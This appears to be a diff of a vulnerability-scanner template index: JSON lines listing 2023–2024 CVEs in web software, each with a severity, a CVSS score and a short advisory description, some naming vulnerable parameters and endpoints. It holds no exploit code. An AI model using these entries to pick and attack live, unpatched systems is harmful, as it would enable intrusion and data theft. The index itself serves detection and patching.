{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
{"ID":"CVE-2023-40504","Info":{"Name":"LG Simple Editor \u003c= v3.21.0 - Command Injection","Severity":"critical","Description":"LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-40504.yaml"}
{"ID":"CVE-2023-40748","Info":{"Name":"PHPJabbers Food Delivery Script - SQL Injection","Severity":"critical","Description":"PHPJabbers Food Delivery Script 3.0 has a SQL injection (SQLi) vulnerability in the \"q\" parameter of index.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-40748.yaml"}
{"ID":"CVE-2023-40749","Info":{"Name":"PHPJabbers Food Delivery Script v3.0 - SQL Injection","Severity":"critical","Description":"PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the \"column\" parameter of index.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-40749.yaml"}
{"ID":"CVE-2023-40750","Info":{"Name":"PHPJabbers Yacht Listing Script v1.0 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the \"action\" parameter of index.php in PHPJabbers Yacht Listing Script v1.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40750.yaml"}
{"ID":"CVE-2023-40751","Info":{"Name":"PHPJabbers Fundraising Script v1.0 - Cross-Site Scripting","Severity":"medium","Description":"PHPJabbers Fundraising Script v1.0 is vulnerable to Cross Site Scripting (XSS) via the \"action\" parameter of index.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40751.yaml"}
{"ID":"CVE-2023-40752","Info":{"Name":"PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the \"action\" parameter of index.php in PHPJabbers Make an Offer Widget v1.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40752.yaml"}
{"ID":"CVE-2023-40753","Info":{"Name":"PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-40753.yaml"}
{"ID":"CVE-2023-40755","Info":{"Name":"PHPJabbers Callback Widget v1.0 - Cross-Site Scripting","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in the \"theme\" parameter of preview.php in PHPJabbers Callback Widget v1.0.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40755.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-40931","Info":{"Name":"Nagios XI v5.11.0 - SQL Injection","Severity":"medium","Description":"A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40931.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
{"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"}
@ -2320,6 +2344,7 @@
{"ID":"CVE-2023-43323","Info":{"Name":"mooSocial 3.1.8 - External Service Interaction","Severity":"medium","Description":"mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-43323.yaml"}
{"ID":"CVE-2023-43325","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43325.yaml"}
{"ID":"CVE-2023-43326","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in multiple url of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-43326.yaml"}
{"ID":"CVE-2023-43373","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the n_utente_agg parameter at /hoteldruid/interconnessioni.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43373.yaml"}
{"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"}
{"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"}
{"ID":"CVE-2023-43654","Info":{"Name":"PyTorch TorchServe SSRF","Severity":"critical","Description":"TorchServe is a tool for serving and scaling PyTorch models in production. TorchServe default configuration lacks proper input validation, enabling third parties to invoke remote HTTP download requests and write files to the disk. This issue could be taken advantage of to compromise the integrity of the system and sensitive data. This issue is present in versions 0.1.0 to 0.8.1. A user is able to load the model of their choice from any URL that they would like to use. The user of TorchServe is responsible for configuring both the allowed_urls and specifying the model URL to be used. A pull request to warn the user when the default value for allowed_urls is used has been merged in PR #2534. TorchServe release 0.8.2 includes this change. Users are advised to upgrade. There are no known workarounds for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43654.yaml"}
@ -2391,6 +2416,8 @@
{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"}
{"ID":"CVE-2023-5375","Info":{"Name":"Mosparo \u003c 1.0.2 - Open Redirect","Severity":"medium","Description":"Open Redirect in GitHub repository mosparo/mosparo prior to 1.0.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5375.yaml"}
{"ID":"CVE-2023-5556","Info":{"Name":"Structurizr on-premises - Cross Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5556.yaml"}
{"ID":"CVE-2023-5558","Info":{"Name":"LearnPress \u003c 4.2.5.5 - Cross-Site Scripting","Severity":"medium","Description":"The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5558.yaml"}
{"ID":"CVE-2023-5561","Info":{"Name":"WordPress Core - Post Author Email Disclosure","Severity":"medium","Description":"WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-5561.yaml"}
{"ID":"CVE-2023-5830","Info":{"Name":"ColumbiaSoft DocumentLocator - Improper Authentication","Severity":"critical","Description":"Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5830.yaml"}
{"ID":"CVE-2023-5863","Info":{"Name":"phpMyFAQ \u003c 3.2.0 - Cross-site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5863.yaml"}
{"ID":"CVE-2023-5914","Info":{"Name":"Citrix StoreFront - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5914.yaml"}
@ -2463,6 +2490,7 @@
{"ID":"CVE-2024-22207","Info":{"Name":"Fastify Swagger-UI - Information Disclosure","Severity":"medium","Description":"fastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-22207.yaml"}
{"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"}
{"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"}
{"ID":"CVE-2024-22476","Info":{"Name":"Intel Neural Compressor \u003c2.5.0 - SQL Injection","Severity":"critical","Description":"Improper input validation in some Intel(R) Neural Compressor software before version 2.5.0 may allow an unauthenticated user to potentially enable escalation of privilege via remote access.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-22476.yaml"}
{"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"}
{"ID":"CVE-2024-23163","Info":{"Name":"GestSup - Account Takeover","Severity":"critical","Description":"","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23163.yaml"}
{"ID":"CVE-2024-23167","Info":{"Name":"GestSup - Cross-Site Scripting","Severity":"high","Description":"GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-23167.yaml"}
@ -2529,6 +2557,11 @@
{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
{"ID":"CVE-2024-32709","Info":{"Name":"WP-Recall \u003c= 16.26.5 - SQL Injection","Severity":"critical","Description":"The WP-Recall Registration, Profile, Commerce \u0026 More plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 16.26.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2024/CVE-2024-32709.yaml"}
{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"}
{"ID":"CVE-2024-32735","Info":{"Name":"CyberPower - Missing Authentication","Severity":"critical","Description":"An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-32735.yaml"}
{"ID":"CVE-2024-32736","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to .\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32736.yaml"}
{"ID":"CVE-2024-32737","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32737.yaml"}
{"ID":"CVE-2024-32738","Info":{"Name":"CyberPower - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32738.yaml"}
{"ID":"CVE-2024-32739","Info":{"Name":"CyberPower \u003c v2.8.3 - SQL Injection","Severity":"high","Description":"A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-32739.yaml"}
{"ID":"CVE-2024-3274","Info":{"Name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3274.yaml"}
{"ID":"CVE-2024-32964","Info":{"Name":"Lobe Chat \u003c= v0.150.5 - Server-Side Request Forgery","Severity":"critical","Description":"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2024/CVE-2024-32964.yaml"}
{"ID":"CVE-2024-33113","Info":{"Name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","Severity":"medium","Description":"D-LINK DIR-845L \u003c=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33113.yaml"}
@ -2546,11 +2579,13 @@
{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the cnt and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"}
{"ID":"CVE-2024-34982","Info":{"Name":"LyLme-Spage - Arbitary File Upload","Severity":"high","Description":"An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-34982.yaml"}
{"ID":"CVE-2024-3552","Info":{"Name":"Web Directory Free \u003c 1.7.0 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3552.yaml"}
{"ID":"CVE-2024-35584","Info":{"Name":"openSIS \u003c 9.1 - SQL Injection","Severity":"high","Description":"SQL injection vulnerability in Ajax.php, ForWindow.php, ForExport.php, Modules.php, functions/HackingLogFnc.php in OpenSis Community Edition 9.1, 8.0, and possibly earlier versions. It is possible for an authenticated user to perform SQL Injection due to the lack to sanitisation. The application takes arbitrary value from \"X-Forwarded-For\" header and appends it to a SQL INSERT statement directly, leading to SQL Injection.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-35584.yaml"}
{"ID":"CVE-2024-35627","Info":{"Name":"TileServer API - Cross Site Scripting","Severity":"medium","Description":"tileserver-gl up to v4.4.10 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /data/v3/?key.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-35627.yaml"}
{"ID":"CVE-2024-36104","Info":{"Name":"Apache OFBiz - Path Traversal","Severity":"critical","Description":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.14. Users are recommended to upgrade to version 18.12.14, which fixes the issue.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-36104.yaml"}
{"ID":"CVE-2024-36401","Info":{"Name":"GeoServer RCE in Evaluating Property Name Expressions","Severity":"critical","Description":"In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36401.yaml"}
{"ID":"CVE-2024-36412","Info":{"Name":"SuiteCRM - SQL Injection","Severity":"critical","Description":"SuiteCRM is an open-source Customer Relationship Management (CRM) software application. Prior to versions 7.14.4 and 8.6.1, a vulnerability in events response entry point allows for a SQL injection attack. Versions 7.14.4 and 8.6.1 contain a fix for this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36412.yaml"}
{"ID":"CVE-2024-36527","Info":{"Name":"Puppeteer Renderer - Directory Traversal","Severity":"medium","Description":"puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36527.yaml"}
{"ID":"CVE-2024-3656","Info":{"Name":"Keycloak \u003c 24.0.5 - Broken Access Control","Severity":"high","Description":"A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2024/CVE-2024-3656.yaml"}
{"ID":"CVE-2024-36683","Info":{"Name":"PrestaShop productsalert - SQL Injection","Severity":"critical","Description":"In the module 'Products Alert' (productsalert) up to version 1.7.4 from Smart Modules for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-36683.yaml"}
{"ID":"CVE-2024-3673","Info":{"Name":"Web Directory Free \u003c 1.7.3 - Local File Inclusion","Severity":"critical","Description":"The Web Directory Free WordPress plugin before 1.7.3 does not validate a parameter before using it in an include(), which could lead to Local File Inclusion issues.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-3673.yaml"}
{"ID":"CVE-2024-36837","Info":{"Name":"CRMEB v.5.2.2 - SQL Injection","Severity":"high","Description":"SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-36837.yaml"}
@ -2573,6 +2608,7 @@
{"ID":"CVE-2024-38856","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Incorrect Authorization vulnerability in Apache OFBiz. This issue affects Apache OFBiz: through 18.12.14. Users are recommended to upgrade to version 18.12.15, which fixes the issue. Unauthenticated endpoints could allow execution of screen rendering code of screens if some preconditions are met (such as when the screen definitions don't explicitly check user's permissions because they rely on the configuration of their endpoints).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-38856.yaml"}
{"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"}
{"ID":"CVE-2024-39250","Info":{"Name":"EfroTech Timetrax v8.3 - Sql Injection","Severity":"high","Description":"EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-39250.yaml"}
{"ID":"CVE-2024-39713","Info":{"Name":"Rocket.Chat - Server-Side Request Forgery (SSRF)","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39713.yaml"}
{"ID":"CVE-2024-39903","Info":{"Name":"Solara \u003c1.35.1 - Local File Inclusion","Severity":"high","Description":"A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version \u003c1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-39903.yaml"}
{"ID":"CVE-2024-39907","Info":{"Name":"1Panel SQL Injection - Authenticated","Severity":"critical","Description":"1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39907.yaml"}
{"ID":"CVE-2024-39914","Info":{"Name":"FOG Project \u003c 1.5.10.34 - Remote Command Execution","Severity":"critical","Description":"FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-39914.yaml"}
@ -2586,30 +2622,39 @@
{"ID":"CVE-2024-41955","Info":{"Name":"Open Redirect in Login Redirect - MobSF","Severity":"medium","Description":"Mobile Security Framework (MobSF) is a security research platform for mobile applications in Android, iOS and Windows Mobile. An open redirect vulnerability exist in MobSF authentication view.\n","Classification":{"CVSSScore":"5.2"}},"file_path":"http/cves/2024/CVE-2024-41955.yaml"}
{"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"}
{"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"}
{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"}
{"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Upload","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"}
{"ID":"CVE-2024-43360","Info":{"Name":"ZoneMinder - SQL Injection","Severity":"critical","Description":"ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43360.yaml"}
